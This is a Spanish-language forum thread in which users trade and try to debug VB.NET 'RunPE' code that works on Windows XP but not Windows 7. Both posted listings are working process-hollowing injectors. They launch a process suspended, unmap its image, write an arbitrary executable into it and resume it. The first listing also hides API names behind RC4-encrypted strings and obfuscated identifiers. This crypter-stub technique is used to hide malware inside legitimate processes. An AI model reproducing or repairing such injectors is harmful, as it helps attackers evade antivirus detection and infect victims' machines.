Ayuda RunPe win7

[Cromatico]

Buenos dias! (Almenos aca en Argentina )
Queria hacer una consulta, estuve buscando varios runpe programados en vb.net, los cuales me han funcionado perfecto en windows xp con framework 4.0 instalado...

Ahora ninguno, de los aproximadamente 6 runpe que encontre, me funciona en windows seven....

Compilado el ejecutable bajo mi maquina win7 con visual studio 2010, lo ejecuto y me dice:
Error CLR: 80004005.
El programa terminará ahora.


Ahora copio el ejecutable en mi maquina con windows xp + framework 4.0 y se ejecuta correctamente inyectado a un proceso en blanco programado en .net tambien... El problema es que con windows 7 no logro hacer funcionar nada!!
Y obviamente tengo instalado el framework por que me lo instala el visual studio...

Alguna idea??

Gracias gente!

[_katze_]

sin codigo no te puedo ayudar! si lo subis mas el compilado asi lo pruebo y te lo corrijo

[Cromatico]

Te dejo el codigo con uno de los runpe que funciona en xp y no en 7:

MAIN:

Código [Seleccionar] Expandir


        Dim X() As Byte
        FileCopy(Application.StartupPath & "\Inject.exe", Application.StartupPath & "\Temp.exe")
        FileCopy(Application.StartupPath & "\Inject.dll", Application.StartupPath & "\IEXPLORE.exe")
        FileOpen(1, Application.StartupPath & "\Temp.exe", OpenMode.Binary)
        ReDim X(0 To LOF(1) - 1)
        FileGet(1, X)
        FileClose(1)
        Call MsgBox("Inyectado correctamente", vbSystemModal, "ASDl")
        RunPE.Iniciar(X, Application.StartupPath & "\IEXPLORE.exe")
        Kill(Application.StartupPath & "\Temp.exe")
        End


Aclaracion: IEXPLORE.EXE es un proyecto de vb.net en blanco, un formulario solo, por que tengo entendido que vb.net puede inyectarse solo en vb.net, entonces cree un proyecto en blanco, en el cual trato de inyectar el codigo, en xp funciona, en seven no...

Y el runpe:

Código [Seleccionar] Expandir


Imports System.Runtime.InteropServices
Imports System.Text

Public Class RunPE
    Public Class makeapi
        Enum flagginglib As UInteger
            DONT_RESOLVE_DLL_REFERENCES = &H1
            LOAD_IGNORE_CODE_AUTHZ_LEVEL = &H10
            LOAD_LIBRARY_AS_DATAFILE = &H2
            LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE = &H40
            LOAD_LIBRARY_AS_IMAGE_RESOURCE = &H20
            LOAD_WITH_ALTERED_SEARCH_PATH = &H8
        End Enum
        Shared Function rc4(ByVal tgIdqYlTptZIYySGkIfl As String, ByVal hsvKghrWvMoOcupfKZXA As String) As String
            Dim NAkhTayqmyFeznwXFsub As Integer = 0
            Dim SlGZgrJMHyawvBYVPHmH As Integer = hsvKghrWvMoOcupfKZXA.Length
            Dim HVBCaKTKpREAVNDpYwhF As Integer() = New Integer(256) {}
            Dim LunuMzlEYOzMEgSJWCJR As New StringBuilder
            Dim ZfwwZXdWiJbOGhpfKUIY As Integer = 0
            Dim OazalfxhTnyTWJdrzWLi As Integer = 0
            Dim AKucfzcguranHHowPlYk As Integer = 0
            Dim DaLPwiLgsIoUrvVLOEXS As String = String.Empty
            Dim ggIDcYNTbtUtqkRWBISB As Integer = 0
            Dim nPinkvyGjktTycrKexsh As Integer() = New Integer(256) {}
            While NAkhTayqmyFeznwXFsub <= 255
                Dim uWPxdmnlqGXcUZAimogU As Char = (hsvKghrWvMoOcupfKZXA.Substring((NAkhTayqmyFeznwXFsub Mod SlGZgrJMHyawvBYVPHmH), 1).ToCharArray()(0))
                nPinkvyGjktTycrKexsh(NAkhTayqmyFeznwXFsub) = NAkhTayqmyFeznwXFsub
                HVBCaKTKpREAVNDpYwhF(NAkhTayqmyFeznwXFsub) = Microsoft.VisualBasic.Strings.Asc(uWPxdmnlqGXcUZAimogU)
                System.Math.Max(System.Threading.Interlocked.Increment(NAkhTayqmyFeznwXFsub), NAkhTayqmyFeznwXFsub - 1)
            End While
            While OazalfxhTnyTWJdrzWLi <= 255
                AKucfzcguranHHowPlYk = (AKucfzcguranHHowPlYk + nPinkvyGjktTycrKexsh(OazalfxhTnyTWJdrzWLi) + HVBCaKTKpREAVNDpYwhF(OazalfxhTnyTWJdrzWLi)) Mod 256
                Dim cUOouGVJrmnlqbipUhgw As Integer = nPinkvyGjktTycrKexsh(OazalfxhTnyTWJdrzWLi)
                nPinkvyGjktTycrKexsh(OazalfxhTnyTWJdrzWLi) = nPinkvyGjktTycrKexsh(AKucfzcguranHHowPlYk)
                nPinkvyGjktTycrKexsh(AKucfzcguranHHowPlYk) = cUOouGVJrmnlqbipUhgw
                System.Math.Max(System.Threading.Interlocked.Increment(OazalfxhTnyTWJdrzWLi), OazalfxhTnyTWJdrzWLi - 1)
            End While
            NAkhTayqmyFeznwXFsub = 1
            While NAkhTayqmyFeznwXFsub <= tgIdqYlTptZIYySGkIfl.Length
                Dim VxiyRYwVydGLxZPzGNII As Integer = 0
                ggIDcYNTbtUtqkRWBISB = (ggIDcYNTbtUtqkRWBISB + 1) Mod 256
                ZfwwZXdWiJbOGhpfKUIY = (ZfwwZXdWiJbOGhpfKUIY + nPinkvyGjktTycrKexsh(ggIDcYNTbtUtqkRWBISB)) Mod 256
                VxiyRYwVydGLxZPzGNII = nPinkvyGjktTycrKexsh(ggIDcYNTbtUtqkRWBISB)
                nPinkvyGjktTycrKexsh(ggIDcYNTbtUtqkRWBISB) = nPinkvyGjktTycrKexsh(ZfwwZXdWiJbOGhpfKUIY)
                nPinkvyGjktTycrKexsh(ZfwwZXdWiJbOGhpfKUIY) = VxiyRYwVydGLxZPzGNII
                Dim mogUiHKshEsjxOqpddYH As Integer = nPinkvyGjktTycrKexsh((nPinkvyGjktTycrKexsh(ggIDcYNTbtUtqkRWBISB) + nPinkvyGjktTycrKexsh(ZfwwZXdWiJbOGhpfKUIY)) Mod 256)
                Dim MECWMqRqoiWxXTFCSctu As Char = tgIdqYlTptZIYySGkIfl.Substring(NAkhTayqmyFeznwXFsub - 1, 1).ToCharArray()(0)
                VxiyRYwVydGLxZPzGNII = Asc(MECWMqRqoiWxXTFCSctu)
                Dim DSbyfPNYKemcORTEIrls As Integer = VxiyRYwVydGLxZPzGNII Xor mogUiHKshEsjxOqpddYH
                LunuMzlEYOzMEgSJWCJR.Append(Chr(DSbyfPNYKemcORTEIrls))
                System.Math.Max(System.Threading.Interlocked.Increment(NAkhTayqmyFeznwXFsub), NAkhTayqmyFeznwXFsub - 1)
            End While
            DaLPwiLgsIoUrvVLOEXS = LunuMzlEYOzMEgSJWCJR.ToString
            LunuMzlEYOzMEgSJWCJR.Length = 0
            Return DaLPwiLgsIoUrvVLOEXS
        End Function
        Declare Function LoadLibraryExA Lib "kernel32" (ByVal uno As String, ByVal due As IntPtr, ByVal cinque As flagginglib) As IntPtr
        Declare Function GetProcAddress Lib "kernel32" (ByVal tre As IntPtr, ByVal quattro As String) As IntPtr
        Shared Function makemake(Of obj)(ByVal plib As String, ByVal pfunc As String) As obj
            Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryExA(plib, CType(0, IntPtr), flagginglib.LOAD_LIBRARY_AS_DATAFILE), pfunc), GetType(obj)), Object), obj)
        End Function
    End Class

    Delegate Function CreateProcess(ByVal appName As String, ByVal commandLine As StringBuilder, ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, ByVal creation As Integer, _
  ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo As Byte(), ByVal pInfo As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function getthrcontx(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function nunmpsctn(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
    Delegate Function rdprocssmr(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSize As Integer, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function resmthrd(ByVal hThread As IntPtr) As UInteger
    Delegate Function strthd(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    Delegate Function vrtall(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr

    Public Shared Function Iniciar(ByVal pByteArray As Byte(), ByVal pProcess0Injectto As String) As Boolean
        Try
            Dim num2 As Integer = BitConverter.ToInt32(pByteArray, 60)
            Dim resm As resmthrd = makeapi.makemake(Of resmthrd)("kernel32", "ResumeThread")
            Dim processInfo As IntPtr() = New IntPtr(3) {}
            Dim startupInfo As Byte() = New Byte(67) {}
            Dim crt As CreateProcess = makeapi.makemake(Of CreateProcess)("kernel32", makeapi.rc4("MŒuÖÈvÒö˜þe(,,", "junkst"))
            Dim num As Integer = BitConverter.ToInt16(pByteArray, num2 + 6)
            Dim ptr4 As New IntPtr(BitConverter.ToInt32(pByteArray, num2 + &H54))
            Dim gettr As getthrcontx = makeapi.makemake(Of getthrcontx)(makeapi.rc4("p¨°Þ2dí", "pass1"), makeapi.rc4("\¨¶ä?2¾ÑÆ-f1©", "pass1"))
            Dim procAttr As IntPtr = IntPtr.Zero


            If crt(Nothing, New StringBuilder(pProcess0Injectto), procAttr, procAttr, False, 4, _
            procAttr, Nothing, startupInfo, processInfo) Then
                Dim ctxt As UInteger() = New UInteger(178) {}
                ctxt(0) = &H10002
                If gettr(processInfo(1), ctxt) Then
                    Dim baseAddr As New IntPtr(ctxt(&H29) + 8L)

                    Dim buffer__1 As IntPtr = IntPtr.Zero
                    Dim bufferSize As New IntPtr(4)

                    Dim numRead As IntPtr = IntPtr.Zero
                    Dim nunmap As nunmpsctn = makeapi.makemake(Of nunmpsctn)("ntdll", "NtUnmapViewOfSection")
                    Dim readprcsmmry As rdprocssmr = makeapi.makemake(Of rdprocssmr)("kernel32", makeapi.rc4("¥Õ lÕß'Ò7ìâè·ÞîÕ", "pass"))

                    If readprcsmmry(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (nunmap(processInfo(0), buffer__1) = 0) Then
                        Dim addr As New IntPtr(BitConverter.ToInt32(pByteArray, num2 + &H34))
                        Dim size As New IntPtr(BitConverter.ToInt32(pByteArray, num2 + 80))
                        Dim vrtal As vrtall = makeapi.makemake(Of vrtall)("kernel32", "VirtualAllocEx")
                        Dim lpBaseAddress As IntPtr = vrtal(processInfo(0), addr, size, &H3000, &H40)

                        Dim lpNumberOfBytesWritten As Integer
                        Dim wrt As wrtproc = makeapi.makemake(Of wrtproc)("kernel32", makeapi.rc4("aúþìÍ;zä®º2mó¹ý", "junks"))

                        wrt(processInfo(0), lpBaseAddress, pByteArray, CUInt(CInt(ptr4)), lpNumberOfBytesWritten)
                        Dim num5 As Integer = num - 1
                        For i As Integer = 0 To num5
                            Dim dst As Integer() = New Integer(9) {}
                            Buffer.BlockCopy(pByteArray, (num2 + &HF8) + (i * 40), dst, 0, 40)
                            Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {}
                            Buffer.BlockCopy(pByteArray, dst(5), buffer2, 0, buffer2.Length)

                            size = New IntPtr(lpBaseAddress.ToInt32() + dst(3))
                            addr = New IntPtr(buffer2.Length)

                            wrt(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten)
                        Next
                        size = New IntPtr(ctxt(&H29) + 8L)
                        addr = New IntPtr(4)

                        wrt(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten)
                        ctxt(&H2C) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(pByteArray, num2 + 40))

                        Dim sethre As strthd = makeapi.makemake(Of strthd)("kernel32", "SetThreadContext")

                        sethre(processInfo(1), ctxt)
                    End If
                End If

                resm(processInfo(1))
            End If
        Catch
            Return False
        End Try
        Return True
    End Function
    Delegate Function wrtproc(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByVal lpNumberOfBytesWritten As Integer) As Boolean
End Class


Gracias katze por el interes!

[Cromatico]

Alguna idea o alguien sabe de alguno que funcione en win7?

Gracias!

[_katze_]

proba amigo con este sino deja que me programo uno de 0

Código (vbnet) [Seleccionar] Expandir

Imports System.Runtime.InteropServices
Imports System.Text

Class DD
    <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> _
Structure STARTUPINFO
        Public cb As Integer
        Public lpReserved As String
        Public lpDesktop As String
        Public lpTitle As String
        Public dwX As Integer
        Public dwY As Integer
        Public dwXSize As Integer
        Public dwYSize As Integer
        Public dwXCountChars As Integer
        Public dwYCountChars As Integer
        Public dwFillAttribute As Integer
        Public dwFlags As Integer
        Public wShowWindow As Short
        Public cbReserved2 As Short
        Public lpReserved2 As Integer
        Public hStdInput As Integer
        Public hStdOutput As Integer
        Public hStdError As Integer
    End Structure
    Private Structure PROCESS_INFORMATION
        Public hProcess As IntPtr
        Public hThread As IntPtr
        Public dwProcessId As Integer
        Public dwThreadId As Integer
    End Structure
    <StructLayout(LayoutKind.Sequential)> _
    Private Structure IMAGE_DOS_HEADER
        Public e_magic As UInt16
        ' Magic number
        Public e_cblp As UInt16
        ' Bytes on last page of file
        Public e_cp As UInt16
        ' Pages in file
        Public e_crlc As UInt16
        ' Relocations
        Public e_cparhdr As UInt16
        ' Size of header in paragraphs
        Public e_minalloc As UInt16
        ' Minimum extra paragraphs needed
        Public e_maxalloc As UInt16
        ' Maximum extra paragraphs needed
        Public e_ss As UInt16
        ' Initial (relative) SS value
        Public e_sp As UInt16
        ' Initial SP value
        Public e_csum As UInt16
        ' Checksum
        Public e_ip As UInt16
        ' Initial IP value
        Public e_cs As UInt16
        ' Initial (relative) CS value
        Public e_lfarlc As UInt16
        ' File address of relocation table
        Public e_ovno As UInt16
        ' Overlay number
        <MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> _
        Public e_res1 As UInt16()
        ' Reserved words
        Public e_oemid As UInt16
        ' OEM identifier (for e_oeminfo)
        Public e_oeminfo As UInt16
        ' OEM information; e_oemid specific
        <MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> _
        Public e_res2 As UInt16()
        ' Reserved words
        Public e_lfanew As Int32
        ' File address of new EXE header
    End Structure
    <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> _
    Private Structure VS_VERSIONINFO
        Public wLength As UInt16
        Public wValueLength As UInt16
        Public wType As UInt16
        <MarshalAs(UnmanagedType.ByValTStr, SizeConst:=15)> _
        Public szKey As String
        Public Padding1 As UInt16
    End Structure
    <StructLayout(LayoutKind.Sequential)> _
    Structure SECURITY_ATTRIBUTES
        Public nLength As Integer
        Public lpSecurityDescriptor As IntPtr
        Public bInheritHandle As Integer
    End Structure
    <StructLayout(LayoutKind.Sequential)> _
    Private Structure VS_FIXEDFILEINFO
        Public dwSignature As UInt32
        Public dwStrucVersion As UInt32
        Public dwFileVersionMS As UInt32
        Public dwFileVersionLS As UInt32
        Public dwProductVersionMS As UInt32
        Public dwProductVersionLS As UInt32
        Public dwFileFlagsMask As UInt32
        Public dwFileFlags As UInt32
        Public dwFileOS As UInt32
        Public dwFileType As UInt32
        Public dwFileSubtype As UInt32
        Public dwFileDateMS As UInt32
        Public dwFileDateLS As UInt32
    End Structure
    <StructLayout(LayoutKind.Sequential)> _
    Public Structure FLOATING_SAVE_AREA


        Public ControlWord As UInteger
        Public StatusWord As UInteger
        Public TagWord As UInteger
        Public ErrorOffset As UInteger
        Public ErrorSelector As UInteger
        Public DataOffset As UInteger
        Public DataSelector As UInteger
        <MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> _
        Public RegisterArea As Byte()
        Public Cr0NpxState As UInteger

    End Structure
    <StructLayout(LayoutKind.Sequential)> _
    Public Structure CONTEXT


        Public ContextFlags As UInteger
        'set this to an appropriate value
        ' Retrieved by CONTEXT_DEBUG_REGISTERS
        Public Dr0 As UInteger
        Public Dr1 As UInteger
        Public Dr2 As UInteger
        Public Dr3 As UInteger
        Public Dr6 As UInteger
        Public Dr7 As UInteger
        ' Retrieved by CONTEXT_FLOATING_POINT
        Public FloatSave As FLOATING_SAVE_AREA
        ' Retrieved by CONTEXT_SEGMENTS
        Public SegGs As UInteger
        Public SegFs As UInteger
        Public SegEs As UInteger
        Public SegDs As UInteger
        ' Retrieved by CONTEXT_INTEGER
        Public Edi As UInteger
        Public Esi As UInteger
        Public Ebx As UInteger
        Public Edx As UInteger
        Public Ecx As UInteger
        Public Eax As UInteger
        ' Retrieved by CONTEXT_CONTROL
        Public Ebp As UInteger
        Public Eip As UInteger
        Public SegCs As UInteger
        Public EFlags As UInteger
        Public Esp As UInteger
        Public SegSs As UInteger
        ' Retrieved by CONTEXT_EXTENDED_REGISTERS
        <MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> _
        Public ExtendedRegisters As Byte()

    End Structure
    <StructLayout(LayoutKind.Sequential)> _
  Public Structure IMAGE_OPTIONAL_HEADER32
        '
        ' Standard fields.
        '
        Public Magic As UInt16
        Public MajorLinkerVersion As [Byte]
        Public MinorLinkerVersion As [Byte]
        Public SizeOfCode As UInt32
        Public SizeOfInitializedData As UInt32
        Public SizeOfUninitializedData As UInt32
        Public AddressOfEntryPoint As UInt32
        Public BaseOfCode As UInt32
        Public BaseOfData As UInt32
        '
        ' NT additional fields.
        '
        Public ImageBase As UInt32
        Public SectionAlignment As UInt32
        Public FileAlignment As UInt32
        Public MajorOperatingSystemVersion As UInt16
        Public MinorOperatingSystemVersion As UInt16
        Public MajorImageVersion As UInt16
        Public MinorImageVersion As UInt16
        Public MajorSubsystemVersion As UInt16
        Public MinorSubsystemVersion As UInt16
        Public Win32VersionValue As UInt32
        Public SizeOfImage As UInt32
        Public SizeOfHeaders As UInt32
        Public CheckSum As UInt32
        Public Subsystem As UInt16
        Public DllCharacteristics As UInt16
        Public SizeOfStackReserve As UInt32
        Public SizeOfStackCommit As UInt32
        Public SizeOfHeapReserve As UInt32
        Public SizeOfHeapCommit As UInt32
        Public LoaderFlags As UInt32
        Public NumberOfRvaAndSizes As UInt32
        <MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> _
        Public DataDirectory As IMAGE_DATA_DIRECTORY()
    End Structure
    <StructLayout(LayoutKind.Sequential)> _
Public Structure IMAGE_FILE_HEADER
        Public Machine As UInt16
        Public NumberOfSections As UInt16
        Public TimeDateStamp As UInt32
        Public PointerToSymbolTable As UInt32
        Public NumberOfSymbols As UInt32
        Public SizeOfOptionalHeader As UInt16
        Public Characteristics As UInt16
    End Structure
    <StructLayout(LayoutKind.Sequential)> _
Public Structure IMAGE_DATA_DIRECTORY
        Public VirtualAddress As UInt32
        Public Size As UInt32
    End Structure
    Public Structure IMAGE_NT_HEADERS
        Public Signature As UInt32
        Public FileHeader As IMAGE_FILE_HEADER
        Public OptionalHeader As IMAGE_OPTIONAL_HEADER32
    End Structure
    Public Enum IMAGE_SIZEOF_SHORT_NAME
        IMAGE_SIZEOF_SHORT_NAME = 8
    End Enum
    Public Structure Misc
        Public PhysicalAddress As System.UInt32
        Public VirtualSize As System.UInt32
    End Structure
    Public Structure IMAGE_SECTION_HEADER
        Public Name As System.Byte
        Public Misc As Misc
        Public VirtualAddress As System.UInt32
        Public SizeOfRawData As System.UInt32
        Public PointerToRawData As System.UInt32
        Public PointerToRelocations As System.UInt32
        Public PointerToLinenumbers As System.UInt32
        Public NumberOfRelocations As System.UInt16
        Public NumberOfLinenumbers As System.UInt16
        Public Characteristics As System.UInt32
    End Structure

    Public Const CONTEXT_X86 = &H10000
    Public Const CONTEXT86_CONTROL = (CONTEXT_X86 Or &H1)          'SS:SP, CS:IP, FLAGS, BP
    Public Const CONTEXT86_INTEGER = (CONTEXT_X86 Or &H2)          'AX, BX, CX, DX, SI, DI
    Public Const CONTEXT86_SEGMENTS = (CONTEXT_X86 Or &H4)         'DS, ES, FS, GS
    Public Const CONTEXT86_FLOATING_POINT = (CONTEXT_X86 Or &H8)   '387 state
    Public Const CONTEXT86_DEBUG_REGISTERS = (CONTEXT_X86 Or &H10) 'DB 0-3,6,7
    Public Const CONTEXT86_FULL = (CONTEXT86_CONTROL Or CONTEXT86_INTEGER Or CONTEXT86_SEGMENTS)
    Public Const CREATE_SUSPENDED = &H4
    Public Const MEM_COMMIT As Long = &H1000&
    Public Const MEM_RESERVE As Long = &H2000&
    Public Const PAGE_NOCACHE As Long = &H200
    Public Const PAGE_EXECUTE_READWRITE As Long = &H40
    Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80
    Public Const PAGE_EXECUTE_READ As Long = &H20
    Public Const PAGE_EXECUTE As Long = &H10
    Public Const PAGE_WRITECOPY As Long = &H8
    Public Const PAGE_NOACCESS As Long = &H1
    Public Const PAGE_READWRITE As Long = &H4

    <DllImport("kernel32.dll")> _
    Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInt32
    End Function
    <DllImport("kernel32.dll")> _
    Private Shared Function GetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean
    End Function
    <DllImport("kernel32.dll")> _
    Private Shared Function SetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean
    End Function

    <DllImport("kernel32.dll")> _
    Private Shared Function LoadLibraryA(ByVal lpLibFileName As String) As Integer
    End Function
    <DllImport("kernel32.dll")> _
    Private Shared Function CreateProcess(ByVal lpApplicationName As String, _
    ByVal lpCommandLine As String, ByRef lpProcessAttributes As SECURITY_ATTRIBUTES, _
     ByRef lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Boolean, _
    ByVal dwCreationFlags As UInt32, ByVal lpEnvironment As IntPtr, ByVal lpCurrentDirectory As String, _
   <[In]()> ByRef lpStartupInfo As STARTUPINFO, _
   <[Out]()> ByRef lpProcessInformation As PROCESS_INFORMATION) As Boolean
    End Function

    <DllImport("kernel32.dll", _
    SetLastError:=True, _
    CharSet:=CharSet.Auto, _
    EntryPoint:="WriteProcessMemory", _
    CallingConvention:=CallingConvention.StdCall)> _
Shared Function WriteProcessMemory( _
ByVal hProcess As IntPtr, _
ByVal lpBaseAddress As IntPtr, _
ByVal lpBuffer As Byte(), _
ByVal iSize As Int32, _
<Out()> ByRef lpNumberOfBytesWritten As Int32) As Boolean
    End Function
    <DllImport("kernel32.dll", _
SetLastError:=True, _
CharSet:=CharSet.Auto, _
EntryPoint:="WriteProcessMemory", _
CallingConvention:=CallingConvention.StdCall)> _
Shared Function WriteProcessMemoryI( _
ByVal hProcess As IntPtr, _
ByVal lpBaseAddress As IntPtr, _
ByVal lpBuffer As IntPtr, _
ByVal iSize As Int32, _
<Out()> ByRef lpNumberOfBytesWritten As Int32) As Boolean
    End Function
    <DllImport("kernel32.dll", EntryPoint:="ReadProcessMemory")> _
    Public Shared Function ReadProcessMemory(ByVal hProcess As IntPtr, _
    ByVal lpBaseAddress As Integer, _
    ByRef lpbuffer As IntPtr, _
    ByVal size As Integer, _
    ByRef lpNumberOfBytesRead As Integer) As Int32
    End Function
    <DllImport("ntdll.dll")> _
    Public Shared Function ZwUnmapViewOfSection(ByVal hProcess As IntPtr, ByVal BaseAddress As IntPtr) As Long
    End Function

    <DllImport("kernel32.dll", SetLastError:=True, ExactSpelling:=True)> _
    Public Shared Function VirtualAllocEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, _
    ByVal dwSize As UInteger, ByVal flAllocationType As UInteger, _
    ByVal flProtect As UInteger) As IntPtr
    End Function
    <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _
    Public Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As UIntPtr, ByVal flNewProtect As UIntPtr, <Out()> ByVal lpflOldProtect As UInteger) As Integer
    End Function

    Const GENERIC_READ As Int32 = &H80000000
    Const FILE_SHARE_READ As UInt32 = &H1
    Const OPEN_EXISTING As UInt32 = 3
    Const FILE_ATTRIBUTE_NORMAL As UInt32 = &H80
    Const INVALID_HANDLE_VALUE As Int32 = -1
    Const PAGE_READONLY As UInt32 = &H2
    Const FILE_MAP_READ As UInt32 = &H4
    Const IMAGE_DOS_SIGNATURE As UInt16 = &H5A4D
    Const RT_VERSION As Int32 = 16

    Private Enum ImageSignatureTypes
        IMAGE_DOS_SIGNATURE = &H5A4D     ''\\ MZ
        IMAGE_OS2_SIGNATURE = &H454E     ''\\ NE
        IMAGE_OS2_SIGNATURE_LE = &H454C  ''\\ LE
        IMAGE_VXD_SIGNATURE = &H454C     ''\\ LE
        IMAGE_NT_SIGNATURE = &H4550      ''\\ PE00
    End Enum

    Public Shared Sub SRexec(ByVal b() As Byte, ByVal sVictim As String)
        Dim sVersion As [String] = Nothing
        Dim pidh As IMAGE_DOS_HEADER
        Dim context As CONTEXT = New CONTEXT()

        Dim Pinh As IMAGE_NT_HEADERS
        Dim Pish As IMAGE_SECTION_HEADER

        Dim pi As PROCESS_INFORMATION = New PROCESS_INFORMATION()
        Dim si As STARTUPINFO = New STARTUPINFO()

        Dim pSec As SECURITY_ATTRIBUTES = New SECURITY_ATTRIBUTES()
        Dim tSec As SECURITY_ATTRIBUTES = New SECURITY_ATTRIBUTES()

        'converts a data type in another type.
        'since .net types are different from types handle by winAPI,  DirectCall a API will cause a type mismatch, since .net types
        ' structure is completely different, using different resources.
        Dim MyGC As GCHandle = GCHandle.Alloc(b, GCHandleType.Pinned)
        Dim ptbuffer As Integer = MyGC.AddrOfPinnedObject.ToInt32
        pidh = Marshal.PtrToStructure(MyGC.AddrOfPinnedObject, pidh.GetType)
        MyGC.Free()

        If CreateProcess(Nothing, sVictim, pSec, tSec, False, &H4, Nothing, Nothing, si, pi) = 0 Then
            Exit Sub
        End If

        Dim vt As Integer = ptbuffer + pidh.e_lfanew
        Pinh = Marshal.PtrToStructure(New IntPtr(vt), Pinh.GetType)

        Dim addr As Long, lOffset As Long, ret As UInteger
        si.cb = Len(si)
        context.ContextFlags = CONTEXT86_INTEGER
       
        'all "IF" are only for better understanding, you could do all verification on the builder and then the rest on the stub
        If Pinh.Signature <> ImageSignatureTypes.IMAGE_NT_SIGNATURE Or pidh.e_magic <> ImageSignatureTypes.IMAGE_DOS_SIGNATURE Then Exit Sub
        If GetThreadContext(pi.hThread, context) And _
            ReadProcessMemory(pi.hProcess, context.Ebx + 8, addr, 4, 0) >= 0 And _
            ZwUnmapViewOfSection(pi.hProcess, addr) >= 0 Then

            Dim ImageBase As UInt32 = VirtualAllocEx(pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
            If ImageBase <> 0 Then
                WriteProcessMemory(pi.hProcess, ImageBase, b, Pinh.OptionalHeader.SizeOfHeaders, ret)

                lOffset = pidh.e_lfanew + 248
                For i As Integer = 0 To Pinh.FileHeader.NumberOfSections - 1
                'math changes, anyone with pe understanding know
                    Pish = Marshal.PtrToStructure(New IntPtr(ptbuffer + lOffset + i * 40), Pish.GetType)
                    Dim braw(Pish.SizeOfRawData) As Byte
                    'more math for reading only the section.  mm API has a "shortcut" when you pass a specified startpoint.
                    '.net can't use so you have to make a new array
                    For j As Integer = 0 To Pish.SizeOfRawData - 1
                        braw(j) = b(Pish.PointerToRawData + j)
                    Next
                    WriteProcessMemory(pi.hProcess, ImageBase + Pish.VirtualAddress, braw, Pish.SizeOfRawData, ret)
                    VirtualProtectEx(pi.hProcess, ImageBase + Pish.VirtualAddress, Pish.Misc.VirtualSize, Protect(Pish.Characteristics), addr)
                Next i
                Dim bb As Byte() = BitConverter.GetBytes(ImageBase)

                WriteProcessMemory(pi.hProcess, context.Ebx + 8, bb, 4, ret)
                context.Eax = ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint
                Call SetThreadContext(pi.hThread, context)
                Call ResumeThread(pi.hThread)
            End If
        End If
    End Sub

    Private Shared Function Protect(ByVal characteristics As Long) As Long
        Dim mapping() As Object = {PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, _
                        PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, _
                        PAGE_READWRITE, PAGE_EXECUTE_READWRITE}

        Protect = mapping(RShift(characteristics, 29))
    End Function
   
    Private Shared Function RShift(ByVal lValue As Long, ByVal lNumberOfBitsToShift As Long) As Long
        RShift = vbLongToULong(lValue) / (2 ^ lNumberOfBitsToShift)
    End Function
    Private Shared Function vbLongToULong(ByVal Value As Long) As Double
        Const OFFSET_4 = 4294967296.0#
        If Value < 0 Then
            vbLongToULong = Value + OFFSET_4
        Else
            vbLongToULong = Value
        End If
    End Function
   
End Class

[Cromatico]

Ya lo habia probado tambien pero nop, ejecuto y me tira:

---------------------------
Error irrecuperable
---------------------------
Error CLR: 80004005.
El programa terminará ahora.
---------------------------
Aceptar   
---------------------------

Sera que hay que compilarlo de alguna forma en particular? probaste vos?

Gracias!

[_katze_]

voy a buscar y corregir eso a ver q sale

[Cromatico]

Dale muchas gracias maestro, espero tu respuesta Saludos

[Cromatico]

Alguien tiene alguna novedad sobre este tema??

Saludos y gracias!